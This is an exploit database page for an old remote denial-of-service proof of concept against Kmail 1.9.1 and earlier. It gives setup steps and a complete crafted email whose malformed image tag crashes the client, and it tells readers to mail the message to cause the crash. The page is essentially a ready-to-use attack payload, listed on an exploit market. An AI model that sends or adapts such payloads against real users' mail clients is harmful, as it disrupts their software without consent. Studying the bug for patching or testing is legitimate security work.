[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kmail <= 1.9.1 (IMG SRC) Remote Denial of Service Vulnerability

Author
nnp
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6203
Category
dos / poc
Date add
10-10-2006
Platform
multiple
===============================================================
Kmail <= 1.9.1 (IMG SRC) Remote Denial of Service Vulnerability
===============================================================




nnp [at] silenthack.co.uk
http://silenthack.co.uk

Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an
incorrectly formatted <img> tag. HTML parsing must be enabled for
this. This can be done by going to  Settings -> Configure Kmail
->Security -> and tick Prefer HTML to Plain Text.

Copy the following into your local /var/spool/mail/`whoami` or send a
mail containing the HTML part to cause a crash.

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

return-Path: <nnp@torvalds>
X-Original-To: nnp
Delivered-To: nnp@torvalds
Received: by torvalds (Postfix, from userid 1000)
       id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST)
To: nnp@torvalds
Message-Id: <20060827000335.2341B7CC25@torvalds>
Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST)
Content-Type: text/html
From: nnp@torvalds (nnp)
Status: RO
X-Status: UC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:


<html>
<IMG SRC=file:"" />
</html>

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#



#  0day.today [2024-12-24]  #